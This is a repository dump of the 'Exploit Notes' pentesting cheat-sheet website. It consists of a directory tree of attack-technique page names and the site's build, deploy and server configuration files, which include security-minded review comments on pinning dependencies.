├── .github ├── FUNDING.yml └── workflows │ └── deploy.yml ├── .gitignore ├── LICENSE ├── README.md ├── _config.ts ├── codecopy.ts ├── deno.json ├── deno.lock ├── import_map.json ├── serve.ts └── src ├── 404.vto ├── _components ├── card.vto ├── footer.vto ├── header.vto ├── navigation.vto └── support.vto ├── _data └── site.yml ├── _includes └── layouts │ ├── base.vto │ └── exploit.vto ├── assets ├── img │ ├── buymecoffee.png │ ├── exploitenotes_logo_bg_nw.png │ ├── exploitnotes_logo_bg_wn.png │ ├── exploitnotes_logo_navy.png │ ├── exploitnotes_logo_white.png │ ├── favicon.ico │ ├── github.png │ ├── hash_cracker.png │ ├── icon.png │ ├── icon_bg.png │ ├── kofi_cropped.png │ ├── kofi_s.png │ ├── malware-notes.png │ ├── screenshot.png │ ├── security-links.png │ ├── theoffseclibrary.png │ ├── title.png │ ├── twitter.png │ ├── x.png │ └── x.svg └── js │ ├── exploit.js │ └── hamburger.js ├── disclaimer.vto ├── exploit ├── _data.yml ├── audio │ ├── _data.yml │ ├── spectrogram.md │ └── sstv.md ├── binary-exploitation │ ├── _data.yml │ ├── cheatsheet │ │ ├── _data.yml │ │ └── pwntools-cheat-sheet.md │ ├── index.md │ └── method │ │ ├── _data.yml │ │ ├── binary-exploitation-with-buffer-overflow.md │ │ ├── binary-exploitation-with-canary-bypass.md │ │ ├── binary-exploitation-with-format-string.md │ │ ├── binary-exploitation-with-got.md │ │ ├── binary-exploitation-with-race-conditions.md │ │ ├── binary-exploitation-with-ret2libc.md │ │ ├── binary-exploitation-with-ret2plt.md │ │ ├── binary-exploitation-with-rop.md │ │ └── binary-exploitation-with-time-guessing.md ├── blockchain │ ├── _data.yaml │ ├── blockchain-pentesting.md │ ├── interact-with-ethereum-using-foundry.md │ ├── interact-with-ethereum-using-python.md │ └── smart-contract │ │ ├── _data.yaml │ │ ├── compile-deploy-run-smart-contract.md │ │ ├── solidity-assembly.md │ │ ├── solidity-contarct-address-recovery.md │ │ ├── solidity-conversion.md │ │ ├── solidity-delegatecall-Attack.md │ │ ├── 
solidity-denial-of-service-attack.md │ │ ├── solidity-overflow-and-underflow.md │ │ ├── solidity-reentrancy-attack.md │ │ ├── solidity-self-destruct-attack.md │ │ ├── solidity-smart-contract-attack-methodology.md │ │ ├── solidity-storage-values-analysis.md │ │ ├── solidity-tx-origin-attack.md │ │ └── web3-js-cheat-sheet.md ├── cloud │ ├── _data.yml │ ├── aws-pentesting.md │ ├── azure-pentesting.md │ └── gcp-pentesting.md ├── container │ ├── _data.yml │ ├── docker │ │ ├── _data.yml │ │ ├── docker-engine-api-pentesting.md │ │ ├── docker-escape.md │ │ ├── docker-registry-pentesting.md │ │ ├── index.md │ │ └── moby-docker-engine-privesc.md │ └── kubernetes │ │ ├── _data.yml │ │ ├── index.md │ │ └── microk8s-pentesting.md ├── cryptography │ ├── _data.yml │ ├── algorithm │ │ ├── _data.yml │ │ ├── aes-cbc-bit-flipping-attack.md │ │ ├── aes-cbc-padding-oracle-attack.md │ │ ├── aes-ecb-padding-attack.md │ │ ├── aes.md │ │ ├── ansible-vault-secret.md │ │ ├── atbash-cipher.md │ │ ├── base32-base64.md │ │ ├── caesar-cipher.md │ │ ├── camellia-cipher.md │ │ ├── certificates.md │ │ ├── des.md │ │ ├── diffie-hellman-key-exchange.md │ │ ├── ecc.md │ │ ├── ecdsa.md │ │ ├── fernet.md │ │ ├── gpg.md │ │ ├── hmac.md │ │ ├── kdbx-files.md │ │ ├── kerberos-tgt-cracking.md │ │ ├── length-extension-attack.md │ │ ├── md4-md5.md │ │ ├── multi-tap-cipher.md │ │ ├── ntlm-ntlmv2.md │ │ ├── pem.md │ │ ├── pgp.md │ │ ├── pkcs.md │ │ ├── powershell-credentials.md │ │ ├── rar.md │ │ ├── ripemd.md │ │ ├── rot13-rot47.md │ │ ├── rpng-guessing.md │ │ ├── rsa.md │ │ ├── sha1-hash-collision-attack.md │ │ ├── sha1-sha256-sha512.md │ │ ├── transposition-cipher.md │ │ └── vigenere-cipher.md │ ├── bit-wise-operation │ │ ├── _data.yml │ │ ├── and-bitwise-operations.md │ │ ├── or-bitwise-operations.md │ │ ├── shift-bitwise-operations.md │ │ └── xor-bitwise-operations.md │ ├── conversion │ │ ├── _data.yml │ │ ├── convert-bytes-to-hex-in-python.md │ │ ├── convert-bytes-to-int-in-python.md │ │ ├── 
convert-bytes-to-string-in-python.md │ │ ├── convert-character-to-binary-in-python.md │ │ ├── convert-character-to-unicode-in-python.md │ │ ├── convert-hex-to-bytes-in-python.md │ │ ├── convert-int-to-binary-in-python.md │ │ ├── convert-int-to-bytes-in-python.md │ │ ├── convert-int-to-hex-in-python.md │ │ ├── convert-string-to-binary-in-python.md │ │ ├── convert-string-to-bytes-in-python.md │ │ ├── convert-unicode-to-character-in-python.md │ │ └── zero-padding-in-python.md │ ├── index.md │ ├── key-derivation-function │ │ ├── _data.yml │ │ ├── bcrypt.md │ │ ├── pbkdf2.md │ │ └── scrypt.md │ ├── math │ │ ├── _data.yml │ │ ├── chinese-remainder-theorem.md │ │ ├── exponential.md │ │ ├── greatest-common-divisor.md │ │ ├── modular-congruence.md │ │ └── quadratic-residue.md │ └── tool │ │ ├── _data.yml │ │ ├── john-the-ripper.md │ │ └── password-safe-pentesting.md ├── database │ ├── _data.yml │ ├── couchdb-pentesting.md │ ├── influxdb-pentesting.md │ ├── mongodb-pentesting.md │ ├── mssql-pentesting.md │ ├── mysql-pentesting.md │ ├── neo4j-pentesting.md │ ├── postgresql-pentesting.md │ ├── redis-pentesting.md │ └── sqlite-pentesting.md ├── dns │ ├── _data.yml │ ├── index.md │ └── multicast-dns-pentesting.md ├── email │ ├── _data.yml │ ├── imap-pentesting.md │ ├── pop-pentesting.md │ ├── receive-email-as-another-address.md │ └── smtp-pentesting.md ├── game │ ├── _data.yml │ ├── chess-game-cheating.md │ ├── minecraft-server-pentesting.md │ └── webassembly-games-hacking.md ├── hardware │ ├── _data.yml │ ├── firmware-analysis.md │ ├── gerber-files.md │ ├── mqtt-pentesting.md │ ├── netgear-pentesting.md │ └── sal-logic-analysis.md ├── linux │ ├── _data.yml │ ├── archive │ │ ├── 7z.md │ │ ├── _data.yml │ │ ├── bzip-bunzip.md │ │ ├── crack-7z-password.md │ │ ├── crack-zip-password.md │ │ ├── gzip-gunzip.md │ │ ├── tar.md │ │ └── zip-unzip.md │ ├── attack │ │ ├── _data.yml │ │ └── fork-bomb.md │ ├── backup │ │ ├── _data.yml │ │ └── borgbackup-pentesting.md │ ├── container │ │ ├── 
_data.yml │ │ └── lxc-lxd-privilege-escalation.md │ ├── management │ │ ├── _data.yml │ │ ├── add-and-delete-groups-in-linux.md │ │ ├── add-and-delete-user-in-linux.md │ │ ├── file-and-directory-ownership-in-linux.md │ │ ├── file-and-directory-permission-in-linux.md │ │ ├── file-transfer-in-linux.md │ │ └── shell-scripting.md │ ├── post-exploitation │ │ ├── _data.yml │ │ ├── cover-your-tracks-in-linux.md │ │ ├── linux-backdoors.md │ │ └── linux-pivoting.md │ ├── privilege-escalation │ │ ├── _data.yml │ │ ├── ansible-playbook-privilege-escalation.md │ │ ├── apache-conf-privilege-escalation.md │ │ ├── bash-eq-privilege-escalation.md │ │ ├── buffer-overflow-privilege-escalation.md │ │ ├── chrome-remote-debugger-pentesting.md │ │ ├── doas │ │ │ ├── _data.yml │ │ │ └── index.md │ │ ├── firefox-credentials-dumping.md │ │ ├── ghidra-debug-mode-rce.md │ │ ├── gnuplot-privilege-escalation.md │ │ ├── index.md │ │ ├── irb-privilege-escalation.md │ │ ├── openssl-privilege-escalation.md │ │ ├── pip-download-code-execution.md │ │ ├── polkit-privilege-escalation.md │ │ ├── python-eval-code-execution.md │ │ ├── python-jails-escape.md │ │ ├── python-privilege-escalation.md │ │ ├── python-yaml-privilege-escalation.md │ │ ├── ruby-privilege-escalation.md │ │ ├── rust-privilege-escalation.md │ │ ├── shared-library-hijacking.md │ │ ├── snapd-privilege-escalation.md │ │ ├── sssd-privilege-escalation.md │ │ ├── sudo │ │ │ ├── _data.yml │ │ │ ├── index.md │ │ │ ├── sudo-clamav-privilege-escalation.md │ │ │ ├── sudo-curl-privilege-escalation.md │ │ │ ├── sudo-dstat-privilege-escalation.md │ │ │ ├── sudo-exiftool-privilege-escalation.md │ │ │ ├── sudo-fail2ban-client-privilege-escalation.md │ │ │ ├── sudo-fail2ban-privilege-escalation.md │ │ │ ├── sudo-git-privilege-escalation.md │ │ │ ├── sudo-java-privilege-escalation.md │ │ │ ├── sudo-openvpn-privilege-escalation.md │ │ │ ├── sudo-path-traversal-privilege-escalation.md │ │ │ ├── sudo-privilege-escalation-by-overriding-shared-library.md │ 
│ │ ├── sudo-reboot-privilege-escalation.md │ │ │ ├── sudo-screen-privilege-escalation.md │ │ │ ├── sudo-service-privilege-escalation.md │ │ │ ├── sudo-shutdown-poweroff-privilege-escalation.md │ │ │ ├── sudo-systemctl-privilege-escalation.md │ │ │ ├── sudo-tee-privilege-escalation.md │ │ │ ├── sudo-umount-privilege-escalation.md │ │ │ ├── sudo-vim-privilege-escalation.md │ │ │ ├── sudo-wall-privilege-escalation.md │ │ │ ├── sudo-wget-privilege-escalation.md │ │ │ └── sudoedit-privilege-escalation.md │ │ ├── tar-wildcard-injection-PrivEsc.md │ │ └── update-motd-privilege-escalation.md │ └── protocol │ │ ├── _data.yml │ │ └── x11-pentesting.md ├── machine-learning │ ├── _data.yml │ ├── computer-vision │ │ ├── Image-Analysis-for-Machine-Learning.md │ │ ├── Image-Manipulation-for-Machine-Learning.md │ │ ├── Image-Recognition-Bypass-for-Machine-Learning.md │ │ └── _data.yml │ ├── data-processing │ │ ├── _data.yml │ │ ├── cluster-analysis-for-machine-learning.md │ │ ├── data-manipulation-for-machine-learning.md │ │ ├── data-visualization-for-machine-learning.md │ │ └── dimensionality-reduction-for-machine-learning.md │ ├── jupyter-notebook-pentesting.md │ ├── llm │ │ ├── _data.yml │ │ └── llm-prompt-injection.md │ ├── model │ │ ├── _data.yml │ │ ├── create-malicious-ml-model.md │ │ ├── ml-model-analysis.md │ │ └── pickle-code-injection.md │ ├── orange-data-mining.md │ ├── read-hdf5-file.md │ └── read-pt.md ├── malware │ ├── _data.yml │ ├── libreoffice-macros.md │ ├── maldoc-analysis.md │ ├── malware-analysis.md │ ├── malware-detection-on-windows.md │ ├── malware-dynamic-analysis-with-remnux.md │ ├── malware-static-analysis.md │ ├── npm-supply-chain-attack.md │ └── splunk-pentesting.md ├── memory │ ├── _data.yml │ └── memory-forensics.md ├── mobile │ ├── _data.yml │ └── android │ │ ├── _data.yml │ │ ├── connect-to-android-device-from-pc.md │ │ └── index.md ├── network │ ├── _data.yml │ ├── apache-hadoop-pentesting.md │ ├── arp-spoofing.md │ ├── attack │ │ ├── _data.yml │ 
│ └── adobe-pdf-attack.md │ ├── eternetip-pentesting.md │ ├── fastcgi-pentesting.md │ ├── firewall.md │ ├── grpc-pentesting.md │ ├── honeypots.md │ ├── mac-flooding-attack.md │ ├── network-traffic-analysis.md │ ├── networking.md │ ├── port-forwarding │ │ ├── _data.yml │ │ ├── port-forwarding-with-chisel.md │ │ ├── port-forwarding-with-plink.md │ │ ├── port-forwarding-with-socat.md │ │ └── port-forwarding-with-ssh.md │ ├── protocol │ │ ├── _data.yml │ │ ├── amqp-pentesting.md │ │ ├── dhcp-pentesting.md │ │ ├── ftp-pentesting.md │ │ ├── irc-pentesting.md │ │ ├── memcache-pentesting.md │ │ ├── modbus-pentesting.md │ │ ├── nfs-pentesting.md │ │ ├── ntp-pentesting.md │ │ ├── pptp-pentesting.md │ │ ├── restricted-shell-bypass.md │ │ ├── rtsp-pentesting.md │ │ ├── snmp-pentesting.md │ │ ├── ssh-pentesting.md │ │ ├── telnet-pentesting.md │ │ ├── tftp-pentesting.md │ │ ├── upnp-pentesting.md │ │ ├── vnc-pentesting.md │ │ └── waste-pentesting.md │ ├── redos.md │ ├── rsync-pentesting.md │ ├── tool │ │ ├── _data.yml │ │ ├── convert-putty-key-to-openssh-key.md │ │ ├── decrypt-putty-sessions-files.md │ │ ├── tshark-cheat-sheet.md │ │ └── wireshark-cheat-sheet.md │ ├── vpn │ │ ├── _data.yml │ │ ├── ipsec-vpn-pentesting.md │ │ └── openvpn-troubleshooting.md │ └── wifi │ │ ├── _data.yml │ │ ├── mitm-attack.md │ │ ├── wifi-hacking.md │ │ └── wifi-password-recovery.md ├── printer │ ├── _data.yml │ ├── ipp-pentesting.md │ └── raw-printing-pentesting.md ├── privacy │ ├── _data.yml │ └── tor │ │ ├── _data.yml │ │ ├── anonymize-traffic-with-tor.md │ │ ├── create-tor-onion-service-with-nginx.md │ │ └── index.md ├── quantum │ ├── _data.yml │ └── read-qasm.md ├── reconnaissance │ ├── _data.yml │ ├── email-analysis.md │ ├── find-leaked-api-keys.md │ ├── index.md │ ├── network │ │ ├── _data.yml │ │ └── port-scan.md │ ├── osint │ │ ├── _data.yml │ │ ├── imint-and-geoint.md │ │ └── index.md │ ├── search-technique │ │ ├── _data.yml │ │ ├── github-dorks.md │ │ ├── google-dorks.md │ │ └── 
shodan-dorks.md │ └── subdomain │ │ ├── _data.yml │ │ ├── subdomain-discovery.md │ │ └── subdomain-takeover.md ├── reverse-engineering │ ├── _data.yml │ ├── assembly │ │ ├── 32-bit-arm-assembly.md │ │ ├── _data.yml │ │ └── x86-assembly.md │ ├── cheatsheet │ │ ├── _data.yml │ │ ├── angr-cheatsheet.md │ │ ├── gdb-cheatsheet.md │ │ ├── rizin-cheatsheet.md │ │ └── windbg-cheatsheet.md │ ├── debugger │ │ ├── _data.yml │ │ ├── gdbserver-pentesting.md │ │ ├── setup-windbg-kernel-mode-with-vmware.md │ │ └── windows-process-internals-with-windbg.md │ ├── index.md │ └── reversing │ │ ├── _data.yml │ │ ├── reversing-elf.md │ │ ├── reversing-jar.md │ │ ├── reversing-ole.md │ │ ├── reversing-pe.md │ │ └── reversing-pyc.md ├── shell │ ├── _data.yml │ ├── bash-history-attack.md │ ├── reverse-shell-cheat-sheet.md │ ├── reverse-shell-with-metasploit.md │ ├── reverse-shell-with-pwncat.md │ ├── upgrade-to-fully-interactive-tty.md │ └── web-reverse-shell.md ├── steganography │ ├── _data.yml │ ├── image-file-reparing.md │ ├── index.md │ └── morse-image-reading.md ├── tool │ ├── _data.yml │ ├── metasploit-cheat-sheets.md │ └── virtual-machine │ │ ├── _data.yml │ │ ├── virtualbox-settings-for-nat-network-and-port-forwarding.md │ │ └── vm-escape.md ├── version-control │ ├── _data.yml │ └── git │ │ ├── _data.yml │ │ ├── create-git-local-server.md │ │ ├── git-github-pentesting.md │ │ ├── gitea-pentesting.md │ │ └── gogs-pentesting.md ├── web │ ├── _data.yml │ ├── apache-activemq-pentesting.md │ ├── apache-tomcat-pentesting.md │ ├── apache-zeppelin-pentesting.md │ ├── api │ │ ├── _data.yml │ │ ├── graphql-pentesting.md │ │ └── index.md │ ├── atlassian-confluence-pentesting.md │ ├── bookmarklet-attack.md │ ├── broken-link-hijacking.md │ ├── browser-in-the-browser-attack.md │ ├── cacti-pentesting.md │ ├── captcha-bypass-with-ocr.md │ ├── cgi-pentesting.md │ ├── clipbucket-pentesting.md │ ├── cms │ │ ├── _data.yml │ │ ├── bolt-cms-pentesting.md │ │ ├── cockpit-cms-pentesting.md │ │ ├── 
concrete-cms-pentesting.md │ │ ├── fuel-cms-pentesting.md │ │ ├── index.md │ │ ├── joomla-cms-pentesting.md │ │ ├── mara-cms-pentesting.md │ │ ├── subrion-cms-pentesting.md │ │ ├── typo3-pentesting.md │ │ └── wordpress-pentesting.md │ ├── code-deobfuscation.md │ ├── codiad-pentesting.md │ ├── cookie │ │ ├── _data.yml │ │ ├── cookie-hijacking.md │ │ └── session-fixation.md │ ├── dompdf-rce.md │ ├── dump-git-repository-from-website.md │ ├── elasticsearch │ │ ├── _data.yml │ │ ├── elasticsearch-pentesting.md │ │ └── kibana-pentesting.md │ ├── extract-web-browser-passwords.md │ ├── framework │ │ ├── _data.yml │ │ ├── dotnet │ │ │ ├── _data.yml │ │ │ └── blazor-pentesting.md │ │ ├── java │ │ │ ├── _data.yml │ │ │ ├── ajp-pentesting.md │ │ │ ├── apache-struts-pentesting.md │ │ │ ├── spring-cloud-function-rce.md │ │ │ └── spring-pentesting.md │ │ ├── javascript │ │ │ ├── _data.yml │ │ │ └── angular-pentesting.md │ │ ├── python │ │ │ ├── _data.yml │ │ │ ├── django-pentesting.md │ │ │ ├── flask-jinja2-pentesting.md │ │ │ ├── python-pickle-rce.md │ │ │ ├── tornado-pentesting.md │ │ │ └── werkzeug-pentesting.md │ │ └── ruby │ │ │ ├── __data.yml │ │ │ └── ruby-on-rails-pentesting.md │ ├── ghostscript-pentesting.md │ ├── go-ssti.md │ ├── grafana-pentesting.md │ ├── hashicorp-consul-pentesting.md │ ├── html-smuggling.md │ ├── icinga-web-pentesting.md │ ├── java-rmi-pentesting.md │ ├── jboss-pentesting.md │ ├── jenkins-pentesting.md │ ├── jwt-pentesting.md │ ├── limesurvey-pentesting.md │ ├── llm-chatbot-pentesting.md │ ├── log4j-pentesting.md │ ├── method │ │ ├── _data.yml │ │ ├── bypass-client-server-side-filter.md │ │ ├── http-rate-limit-bypass.md │ │ ├── waf-detection.md │ │ ├── web-basic-pentesting.md │ │ ├── web-content-discovery.md │ │ ├── web-login-bypass.md │ │ ├── web-registration-attack.md │ │ ├── web-server-security-misconfiguration.md │ │ └── web-vhost-enumeration.md │ ├── microsoft │ │ ├── _data.yml │ │ └── microsoft-exchange-server-pentesting.md │ ├── 
opencats-pentesting.md │ ├── php-hash-hmac-bypass.md │ ├── php-rce-cheat-sheet.md │ ├── php-srand-time-abusing.md │ ├── restaurant-management-system.md │ ├── security-risk │ │ ├── _data.yml │ │ ├── blind-xxe.md │ │ ├── broken-access-control.md │ │ ├── business-logic-attack.md │ │ ├── client-side-javaScript-validation-bypass.md │ │ ├── cors-attack.md │ │ ├── crlf-injection.md │ │ ├── csrf.md │ │ ├── directory-traversal.md │ │ ├── dom-cloberring.md │ │ ├── erb-ssti.md │ │ ├── file-inclusion.md │ │ ├── file-upload-attack-on-exiftool.md │ │ ├── file-upload-attack-on-imagemagick.md │ │ ├── file-upload-attack.md │ │ ├── host-header-attack.md │ │ ├── http-header-injection.md │ │ ├── http-request-smuggling.md │ │ ├── idor-attack.md │ │ ├── insecure-deserialization.md │ │ ├── json-net-deserialization.md │ │ ├── latex-injection.md │ │ ├── nodejs-deserialization-attack.md │ │ ├── nosql-injection.md │ │ ├── oauth-attack.md │ │ ├── open-redirect.md │ │ ├── os-command-injection.md │ │ ├── php-filters-chain.md │ │ ├── php-object-injection.md │ │ ├── prototype-pollution-in-client-side.md │ │ ├── prototype-pollution-in-server-side.md │ │ ├── redis-ssrf.md │ │ ├── sql-injection-cheat-sheet.md │ │ ├── sql-injection-with-sqlmap.md │ │ ├── sql-injection.md │ │ ├── ssrf.md │ │ ├── ssti.md │ │ ├── web-cache-deception.md │ │ ├── web-cache-poisoning.md │ │ ├── web-race-condition-attack.md │ │ ├── wkhtmltopdf-ssrf.md │ │ ├── xss-with-dynamic-pdf.md │ │ ├── xss.md │ │ ├── xst.md │ │ └── xxe.md │ ├── teamcity-pentesting.md │ ├── template-engine │ │ ├── _data.yml │ │ ├── jsrender-template-injection.md │ │ └── pug-pentesting.md │ ├── tiny-file-manager-pentesting.md │ ├── tool │ │ ├── _data.yml │ │ ├── add-custom-http-headers-in-burp-suite.md │ │ ├── automate-sequence-requests-with-burp-intruder.md │ │ ├── burp-suite-troubleshooting.md │ │ ├── how-to-use-owasp-zap.md │ │ ├── integrate-burp-request-and-sqlmap.md │ │ ├── socks-proxy-in-burp-suite.md │ │ └── turbo-intruder-in-burp-suite.md │ ├── 
web-browser-settings-for-pentesting.md │ ├── web-php-pentesting.md │ ├── webanno-pentesting.md │ ├── webdav-pentesting.md │ ├── webmin-pentesting.md │ └── websocket-pentesting.md └── windows │ ├── _data.yml │ ├── active-directory │ ├── _data.yml │ ├── ad-cs-pentesting.md │ ├── as-rep-roasting.md │ ├── constrained-delegation-attack.md │ ├── dacl-attack.md │ ├── index.md │ ├── kerberoasting-attack.md │ ├── kerberos-pentesting.md │ ├── laps-pentesting.md │ ├── ldap-injection.md │ ├── ldap-pentesting.md │ ├── netlogon-elevasion.md │ ├── resource-based-constrained-delegation-attack.md │ ├── shadow-credentials.md │ └── smb-pentesting.md │ ├── dotnet │ ├── _data.yml │ └── index.md │ ├── forensics │ ├── _data.yml │ ├── index.md │ ├── reading-onedrive-logs.md │ ├── windows-disk-management.md │ ├── windows-memory-dump-analysis.md │ └── windows-xml-eventLog.md │ ├── post-exploitation │ ├── _data.yml │ └── window-pivoting.md │ ├── powershell │ ├── _data.yml │ ├── index.md │ └── powershell-executionpolicy-bypass.md │ ├── privilege-escalation │ ├── _data.yml │ ├── activate-administrator-account-on-windows.md │ ├── add-edit-delete-users-on-windows.md │ ├── dumping-credentials-from-windows-vault.md │ ├── dumping-credentials-with-keymgr-dll.md │ ├── dumping-windows-password-hashes.md │ ├── index.md │ ├── iperius-backup-service-privilege-escalation.md │ ├── login-windows-shell.md │ ├── manageEngine-adselfservice-plus.md │ ├── mimikatz.md │ ├── outlook-reminder-privilege-escalation.md │ ├── spn-jacking.md │ ├── switch-user-on-windows.md │ ├── uac-bypass.md │ ├── windows-privesc-with-adcs.md │ ├── windows-privesc-with-dll-hijacking.md │ ├── windows-privesc-with-kerberos.md │ ├── windows-privesc-with-localpotato.md │ ├── windows-privesc-with-registry-keys.md │ ├── windows-privesc-with-remotepotato.md │ ├── windows-privesc-with-sebackupprivilege.md │ └── windows-privesc-with-unquoted-service-path.md │ ├── protocol │ ├── _data.yml │ ├── msrpc-pentesting.md │ ├── rdp-pentesting.md │ └── 
winrm-pentesting.md │ ├── service │ ├── _data.yml │ ├── m365-pentesting.md │ ├── microsoft-outlook-message.md │ ├── microsoft-word-pentesting.md │ └── windows-print-spooler-service.md │ ├── technique │ ├── _data.yml │ └── download-files-in-windows.md │ └── wsl │ ├── _data.yml │ └── wsl-pentesting.md ├── index.vto ├── privacy-policy.vto ├── styles.css └── support.vto
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
# These are supported funding model platforms

github: [hideckies]
--------------------------------------------------------------------------------
/.github/workflows/deploy.yml:
--------------------------------------------------------------------------------
# Builds the Lume site and publishes it to Deno Deploy on every push to `main`.
#
# Security notes (review):
# - The trigger is `push` to `main` only. Keep it that way: the job is issued an
#   OIDC token (`id-token: write`), so it must never be reachable from untrusted
#   input such as `pull_request_target` or fork pull requests.
# - `permissions` is scoped to what the OIDC deploy and a read-only checkout
#   need; do not widen it.
# - Every third-party action below is referenced by a mutable major tag
#   (`@v4`, `@v1`). Whatever code that tag points to at run time executes in
#   this job with the OIDC token available, so pin each `uses:` to a full
#   commit SHA (keep the tag in a trailing comment) and let a dependency bot
#   bump the SHA.
# - `deno task build` expands to `deno run -A` (see deno.json), i.e. the site
#   generator and every remote module it pulls run with all permissions on the
#   runner. Lume is pinned to v2.2.1 in import_map.json and a deno.lock is
#   committed; keep both under review so a lockfile change is a visible diff.
name: Publish on Deno Deploy

on:
  push:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-latest
    # Least privilege: the OIDC token is what authenticates to Deno Deploy;
    # `contents: read` is all the checkout needs.
    permissions:
      id-token: write
      contents: read

    steps:
      - name: Clone repository
        # TODO(review): pin to a full commit SHA (e.g. actions/checkout@<sha> # v4).
        uses: actions/checkout@v4

      - name: Setup Deno environment
        # TODO(review): pin to a full commit SHA. `v1.x` floats to the newest
        # Deno 1.x release at run time; pin an exact version for reproducible builds.
        uses: denoland/setup-deno@v1
        with:
          deno-version: v1.x

      - name: Build site
        # Runs lume via `deno run -A` (deno.json: "build" -> "lume" task).
        run: deno task build

      - name: Deploy to Deno Deploy
        # TODO(review): pin to a full commit SHA.
        # `import-map` points at deno.json, which delegates to import_map.json
        # through its "importMap" key.
        uses: denoland/deployctl@v1
        with:
          project: "hideckies-exploit-notes"
          import-map: "./deno.json"
          entrypoint: serve.ts
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
_site
_bin

.vscode
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
Copyright (c) 2022 hdks

Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
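without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:

The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/deno.json:
--------------------------------------------------------------------------------
{
  "importMap": "./import_map.json",
  "tasks": {
    "lume": "echo \"import 'lume/cli.ts'\" | deno run -A -",
    "build": "deno task lume",
    "serve": "deno task lume -s"
  },
  "compilerOptions": {
    "jsx": "react-jsx",
    "jsxImportSource": "npm:react",
    "types": [
      "lume/types.ts"
    ]
  }
}
--------------------------------------------------------------------------------
/import_map.json:
--------------------------------------------------------------------------------
{
  "imports": {
    "lume/": "https://deno.land/x/lume@v2.2.1/"
  }
}
--------------------------------------------------------------------------------
/serve.ts:
--------------------------------------------------------------------------------
// Runtime entry point used by Deno Deploy (see .github/workflows/deploy.yml):
// serves the static output that `deno task build` wrote to ./_site.
//
// The lume modules are pinned to the same release that import_map.json pins
// (v2.2.1). The previous unversioned `https://deno.land/x/lume/...` URLs
// resolved to whatever lume release was current at deploy time, so the
// production server could silently pick up a newer or tampered module that
// the build itself never used. Keep this version in sync with
// import_map.json when upgrading; if the deploy step's import map is
// confirmed to apply to this file, these could become bare `lume/...`
// specifiers instead.
import Server from "https://deno.land/x/lume@v2.2.1/core/server.ts";
import cacheBusting from "https://deno.land/x/lume@v2.2.1/middlewares/cache_busting.ts";
import expires from "https://deno.land/x/lume@v2.2.1/middlewares/expires.ts";
import notFound from "https://deno.land/x/lume@v2.2.1/middlewares/not_found.ts";

// Built static files; shared by the server root and the 404 middleware so
// the two cannot drift apart.
const SITE_ROOT = `${Deno.cwd()}/_site`;
const PORT = 8000;

const server = new Server({
  port: PORT,
  root: SITE_ROOT,
});

// Unknown paths get the pre-rendered /404 page (src/404.vto). Registered
// first, before cache busting and Expires headers, as in the original order.
server.use(notFound({
  root: SITE_ROOT,
  page404: "/404",
}));
server.use(cacheBusting());
server.use(expires());

server.start();

console.log(`Listening on http://localhost:${PORT}`);
--------------------------------------------------------------------------------
/src/404.vto:
--------------------------------------------------------------------------------
---
layout: layouts/base.vto
bodyClass: body-404
url: /404
---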
8 |

Page Not Found

9 |

10 | Go 11 | Home 12 |

13 |
14 | -------------------------------------------------------------------------------- /src/_components/card.vto: -------------------------------------------------------------------------------- 1 |
7 |
8 | {{ icon }} 9 |

{{ category }}

10 |
11 |
12 | 23 |
24 |
-------------------------------------------------------------------------------- /src/_components/support.vto: -------------------------------------------------------------------------------- 1 |
2 |

Support Me!

3 |

4 | If you find this site helpful, please consider supporting my ongoing efforts through a donation. 5 |

6 |
7 | {{# BuyMeCoffee #}} 8 | 12 | Buy Me A Coffee 17 | 18 | {{# Ko-Fi #}} 19 | 23 | Buy Me a Coffee at ko-fi.com 29 | 30 |
31 |
--------------------------------------------------------------------------------
/src/_data/site.yml:
--------------------------------------------------------------------------------
title: Exploit Notes
description: Sticky notes for pentesting. Search hacking techniques and tools for penetration testing, bug bounty, and CTFs.
author: hdks
github:
  name: GitHub
  url: https://github.com/hideckies/exploit-notes
twitter:
  name: Twitter
  url: https://twitter.com/hideckies
buymecoffee:
  name: Buy Me a Coffee
  url: https://buymeacoffee.com/hdks
kofi:
  name: Ko-fi
  url: https://ko-fi.com/hideckies
security_links:
  name: Security Links
  url: https://security-links.hdks.org/
  desc: A curated list of websites for cybersecurity.
hermit:
  name: Hermit C2
  url: https://github.com/hideckies/hermit
  desc: A command and control framework.
lolgen:
  name: LOLGEN
  url: https://lolgen.hdks.org/
  desc: Living Off The Land Payload Generator.
28 | -------------------------------------------------------------------------------- /src/assets/img/buymecoffee.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/buymecoffee.png -------------------------------------------------------------------------------- /src/assets/img/exploitenotes_logo_bg_nw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/exploitenotes_logo_bg_nw.png -------------------------------------------------------------------------------- /src/assets/img/exploitnotes_logo_bg_wn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/exploitnotes_logo_bg_wn.png -------------------------------------------------------------------------------- /src/assets/img/exploitnotes_logo_navy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hdks-bug/exploit-notes/3c72d22aa631c0139d6af368045b88c0784bcb42/src/assets/img/exploitnotes_logo_navy.png 